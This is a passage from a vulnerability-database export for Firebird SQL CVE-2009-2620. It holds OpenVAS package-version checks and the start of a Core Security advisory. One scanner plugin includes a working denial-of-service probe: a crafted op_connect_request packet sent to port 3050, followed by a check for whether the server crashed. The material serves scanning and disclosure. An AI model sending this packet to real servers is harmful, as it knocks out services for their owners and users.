test_version2:\"2.5.0.23247\")){\n security_message(firebird_port);\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:39:35", "bulletinFamily": "scanner", "description": "The remote host is missing an update to firebird\nannounced via advisory FEDORA-2009-8317.", "modified": "2018-04-06T00:00:00", "published": "2009-09-02T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064739", "id": "OPENVAS:136141256231064739", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-8317 (firebird)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8317.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8317 (firebird)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nUpgrade from previous package version may be a problem since previous\nversion remove /var/run/firebird and it shouldn't.\nThis release fix this problem for future updates If you are in that\ncase (no longer /var/run/firebird directory after upgrade), just\nreinstall firebird-2.1.3.18185.0-2 package or create\n/var/run/firebird owned by user firebird\n\nChangeLog:\n\n* Wed Aug 5 2009 Philippe Makowski 2.1.3.18185.0-2\n- rename /usr/bin/gstat to /usr/bin/gstat-fb to avoid conflict with ganglia-gmond (rh #515510)\n- remove stupid rm -rf in postun\n* Thu Jul 30 2009 Philippe Makowski 2.1.3.18185.0-1\n- Update to 2.1.3.18185\n- Fix rh #514463\n- Remove doc patch\n- Apply backport initscript patch\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update firebird' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8317\";\ntag_summary = \"The remote host is missing an update to firebird\nannounced via advisory FEDORA-2009-8317.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64739\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2620\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Core 10 FEDORA-2009-8317 (firebird)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=514463\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"firebird\", rpm:\"firebird~2.1.3.18185.0~2.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-classic\", rpm:\"firebird-classic~2.1.3.18185.0~2.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-devel\", rpm:\"firebird-devel~2.1.3.18185.0~2.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-doc\", rpm:\"firebird-doc~2.1.3.18185.0~2.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-filesystem\", rpm:\"firebird-filesystem~2.1.3.18185.0~2.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-libfbclient\", rpm:\"firebird-libfbclient~2.1.3.18185.0~2.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-libfbembed\", rpm:\"firebird-libfbembed~2.1.3.18185.0~2.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-superserver\", rpm:\"firebird-superserver~2.1.3.18185.0~2.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-debuginfo\", rpm:\"firebird-debuginfo~2.1.3.18185.0~2.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:37:16", "bulletinFamily": "scanner", "description": "The remote host is missing an update to firebird\nannounced via advisory FEDORA-2009-8340.", "modified": "2018-04-06T00:00:00", "published": "2009-09-02T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064742", "id": "OPENVAS:136141256231064742", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-8340 (firebird)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8340.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8340 (firebird)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nUpgrade from previous package version may be a problem since previous version\nremove /var/run/firebird and it shouldn't\n\nThis release fix this problem for future updates\nIf you are in that case (no longer /var/run/firebird directory\nafter upgrade), just reinstall firebird-2.1.3.18185.0-2 package\nor create /var/run/firebird owned by user firebird\n\nChangeLog:\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update firebird' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8340\";\ntag_summary = \"The remote host is missing an update to firebird\nannounced via advisory FEDORA-2009-8340.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64742\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2620\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Core 11 FEDORA-2009-8340 (firebird)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=514463\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"firebird\", rpm:\"firebird~2.1.3.18185.0~2.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-classic\", rpm:\"firebird-classic~2.1.3.18185.0~2.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-devel\", rpm:\"firebird-devel~2.1.3.18185.0~2.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-doc\", rpm:\"firebird-doc~2.1.3.18185.0~2.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-filesystem\", rpm:\"firebird-filesystem~2.1.3.18185.0~2.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-libfbclient\", rpm:\"firebird-libfbclient~2.1.3.18185.0~2.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-libfbembed\", rpm:\"firebird-libfbembed~2.1.3.18185.0~2.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-superserver\", rpm:\"firebird-superserver~2.1.3.18185.0~2.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-debuginfo\", rpm:\"firebird-debuginfo~2.1.3.18185.0~2.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:39:55", "bulletinFamily": "scanner", "description": "The remote host is missing an update to firebird\nannounced via advisory MDVSA-2009:186.", "modified": "2018-04-06T00:00:00", "published": "2009-08-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064529", "id": "OPENVAS:136141256231064529", "title": "Mandrake Security Advisory MDVSA-2009:186 (firebird)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_186.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:186 (firebird)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been found and corrected in firebird:\n\nsrc/remote/server.cpp in fbserver.exe in Firebird SQL 1.5 before\n1.5.6, 2.0 before 2.0.6, 2.1 before 2.1.3, and 2.5 before 2.5 Beta 2\nallows remote attackers to cause a denial of service (daemon crash)\nvia a malformed op_connect_request message that triggers an infinite\nloop or NULL pointer dereference (CVE-2009-2620).\n\nThis update provides fixes for this vulnerability.\n\nAffected: Enterprise Server 5.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:186\";\ntag_summary = \"The remote host is missing an update to firebird\nannounced via advisory MDVSA-2009:186.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64529\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-08-17 16:54:45 +0200 (Mon, 17 Aug 2009)\");\n script_cve_id(\"CVE-2009-2620\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:186 (firebird)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"firebird\", rpm:\"firebird~2.1.1.17910.0~2.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-classic\", rpm:\"firebird-classic~2.1.1.17910.0~2.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-devel\", rpm:\"firebird-devel~2.1.1.17910.0~2.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-server-classic\", rpm:\"firebird-server-classic~2.1.1.17910.0~2.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-server-common\", rpm:\"firebird-server-common~2.1.1.17910.0~2.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-server-superserver\", rpm:\"firebird-server-superserver~2.1.1.17910.0~2.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-superserver\", rpm:\"firebird-superserver~2.1.1.17910.0~2.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-utils-classic\", rpm:\"firebird-utils-classic~2.1.1.17910.0~2.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-utils-superserver\", rpm:\"firebird-utils-superserver~2.1.1.17910.0~2.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libfbclient2\", rpm:\"libfbclient2~2.1.1.17910.0~2.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libfbembed2\", rpm:\"libfbembed2~2.1.1.17910.0~2.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64fbclient2\", rpm:\"lib64fbclient2~2.1.1.17910.0~2.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64fbembed2\", rpm:\"lib64fbembed2~2.1.1.17910.0~2.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:56:59", "bulletinFamily": "scanner", "description": "The remote host is missing an update to firebird\nannounced via advisory MDVSA-2009:186.", "modified": "2017-07-07T00:00:00", "published": "2009-08-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=64529", "id": "OPENVAS:64529", "title": "Mandrake Security Advisory MDVSA-2009:186 (firebird)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_186.nasl 6587 2017-07-07 06:35:35Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:186 (firebird)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been found and corrected in firebird:\n\nsrc/remote/server.cpp in fbserver.exe in Firebird SQL 1.5 before\n1.5.6, 2.0 before 2.0.6, 2.1 before 2.1.3, and 2.5 before 2.5 Beta 2\nallows remote attackers to cause a denial of service (daemon crash)\nvia a malformed op_connect_request message that triggers an infinite\nloop or NULL pointer dereference (CVE-2009-2620).\n\nThis update provides fixes for this vulnerability.\n\nAffected: Enterprise Server 5.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:186\";\ntag_summary = \"The remote host is missing an update to firebird\nannounced via advisory MDVSA-2009:186.\";\n\n \n\nif(description)\n{\n script_id(64529);\n script_version(\"$Revision: 6587 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 08:35:35 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-08-17 16:54:45 +0200 (Mon, 17 Aug 2009)\");\n script_cve_id(\"CVE-2009-2620\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:186 (firebird)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"firebird\", rpm:\"firebird~2.1.1.17910.0~2.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-classic\", rpm:\"firebird-classic~2.1.1.17910.0~2.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-devel\", rpm:\"firebird-devel~2.1.1.17910.0~2.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-server-classic\", rpm:\"firebird-server-classic~2.1.1.17910.0~2.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-server-common\", rpm:\"firebird-server-common~2.1.1.17910.0~2.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-server-superserver\", rpm:\"firebird-server-superserver~2.1.1.17910.0~2.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-superserver\", rpm:\"firebird-superserver~2.1.1.17910.0~2.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-utils-classic\", rpm:\"firebird-utils-classic~2.1.1.17910.0~2.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-utils-superserver\", rpm:\"firebird-utils-superserver~2.1.1.17910.0~2.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libfbclient2\", rpm:\"libfbclient2~2.1.1.17910.0~2.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libfbembed2\", rpm:\"libfbembed2~2.1.1.17910.0~2.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64fbclient2\", rpm:\"lib64fbclient2~2.1.1.17910.0~2.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64fbembed2\", rpm:\"lib64fbembed2~2.1.1.17910.0~2.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:40:19", "bulletinFamily": "scanner", "description": "The host is running Firebird and is prone to Denial of Service\n Vulnerability.", "modified": "2019-04-29T00:00:00", "published": "2009-09-11T00:00:00", "id": "OPENVAS:1361412562310800852", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800852", "title": "Firebird SQL 'op_connect_request' Denial Of Service Vulnerability (Windows)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Firebird SQL 'op_connect_request' Denial Of Service Vulnerability (Windows)\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800852\");\n script_version(\"2019-04-29T15:08:03+0000\");\n script_tag(name:\"last_modification\", value:\"2019-04-29 15:08:03 +0000 (Mon, 29 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2009-09-11 18:01:06 +0200 (Fri, 11 Sep 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cve_id(\"CVE-2009-2620\");\n script_bugtraq_id(35842);\n script_name(\"Firebird SQL 'op_connect_request' Denial Of Service Vulnerability (Windows)\");\n script_xref(name:\"URL\", value:\"http://tracker.firebirdsql.org/browse/CORE-2563\");\n script_xref(name:\"URL\", value:\"http://www.coresecurity.com/content/firebird-sql-dos\");\n\n script_category(ACT_MIXED_ATTACK);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"find_service.nasl\", \"gb_firebird_detect_win.nasl\");\n script_mandatory_keys(\"Firebird-SQL/Ver\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to cause Denial of Service in\n the affected application.\");\n script_tag(name:\"affected\", value:\"Firebird SQL version 1.5 before 1.5.6, 2.0 before 2.0.6, 2.1 before 2.1.3,\n and 2.5 before 2.5 Beta 2 on Windows.\");\n script_tag(name:\"insight\", value:\"The flaw is due to error in the 'rc/remote/server.cpp' in fbserver.exe.\n It fails to sanitise the input sent via a malformed op_connect_request\n message that triggers an infinite loop or NULL pointer dereference.\");\n script_tag(name:\"solution\", value:\"Upgrade to version 1.5.6, 2.0.6, 2.1.3, or 2.5 Beta 2 or later.\");\n script_tag(name:\"summary\", value:\"The host is running Firebird and is prone to Denial of Service\n Vulnerability.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"version_func.inc\");\n\nfirebird_port = 3050;\n\nif(!safe_checks() && get_port_state(firebird_port))\n{\n firebird_soc = http_open_socket(firebird_port);\n if(firebird_soc)\n {\n packet = raw_string(0x00, 0x00, 0x00, 0x35);\n packet += crap(data:\"A\", length:12);\n\n send(socket:firebird_soc, data:string(packet));\n close(firebird_soc);\n sleep(10);\n\n firebird_soc2 = http_open_socket(firebird_port);\n if(!firebird_soc2){\n security_message(firebird_port);\n exit(0);\n }\n close(firebird_soc2);\n }\n}\n\nver = get_kb_item(\"Firebird-SQL/Ver\");\nif(!ver)\n exit(0);\n\nif(version_in_range(version:ver, test_version:\"1.5\", test_version2:\"1.5.5.4926\") ||\n version_in_range(version:ver, test_version:\"2.0\", test_version2:\"2.0.5.13206\")||\n version_in_range(version:ver, test_version:\"2.1\", test_version2:\"2.1.2.18118\")||\n version_in_range(version:ver, test_version:\"2.5\", test_version2:\"2.5.0.23247\")){\n security_message(firebird_port);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "seebug": [{"lastseen": "2017-11-19T18:42:18", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2009-07-29T00:00:00", "published": "2009-07-29T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-11929", "id": "SSV:11929", "type": "seebug", "title": "Firebird SQL op_connect_request main listener shutdown Vulnerability", "sourceData": "\n -----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n Core Security Technologies - CoreLabs Advisory\r\n http://www.coresecurity.com/corelabs/\r\n\r\nFirebird SQL op_connect_request main listener shutdown vulnerability\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: Firebird SQL op_connect_request main listener shutdown vulnerability\r\nAdvisory ID: CORE-2009-0707\r\nAdvisory URL: http://www.coresecurity.com/content/firebird-sql-dos\r\nDate published: 2009-07-28\r\nDate of last update: 2009-07-28\r\nVendors contacted: Firebird SQL\r\nRelease mode: Coordinated release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Denial of service (DoS)\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nBugtraq ID: 35842\r\nCVE Name: CVE-2009-2620\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nFirebird SQL [1] is an open source relational database management system\r\noffering many ANSI SQL standard features that runs on Linux, Windows,\r\nand a variety of Unix platforms.\r\n\r\nA remote denial of service vulnerability has been found in Firebird SQL,\r\nwhich can be exploited by a remote attacker to force the server to close\r\nthe socket where it is listening for incoming connections and to enter\r\nan infinite loop, by sending an unexpected 'op_connect_request' message\r\nwith invalid data to the server.\r\n\r\n\r\n4. *Vulnerable packages*\r\n\r\n . Firebird SQL v1.5.5\r\n . 